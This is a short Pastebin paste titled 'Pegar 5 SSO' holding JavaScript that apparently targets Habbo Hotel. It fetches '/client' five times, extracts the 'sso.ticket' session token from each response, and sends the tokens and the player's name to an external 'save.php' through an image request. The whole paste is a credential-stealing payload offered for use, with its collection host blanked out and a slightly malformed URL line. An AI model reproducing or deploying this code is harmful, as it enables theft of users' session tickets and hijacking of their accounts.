Advertisement
Fabriciool

Pegar 5 SSO

Oct 29th, 2013
138
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. new Ajax.Request('/client', {
  2.     onComplete: function (x) {
  3.         var sso1 = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  4.  
  5. new Ajax.Request('/client', {
  6.     onComplete: function (x) {
  7.         var sso2 = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  8.  
  9. new Ajax.Request('/client', {
  10.     onComplete: function (x) {
  11.         var sso3 = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  12.  
  13. new Ajax.Request('/client', {
  14.     onComplete: function (x) {
  15.         var sso4 = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  16.  
  17. new Ajax.Request('/client', {
  18.     onComplete: function (x) {
  19.         var sso5 = x.responseText.match(/"sso.ticket" : "(.+)"/)[0].split('"')[3];
  20.  
  21.  
  22.         new Image().src = 'http://'--'/save.php?sso1='+ sso1 +'&sso2='+ sso2 +'&sso3='+ sso3 +'&sso4='+ sso4 +'&sso5='+ sso5 +'&habbo='+ habboName +'&owner=';
  23.     }
  24. });}});}});}});}});
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement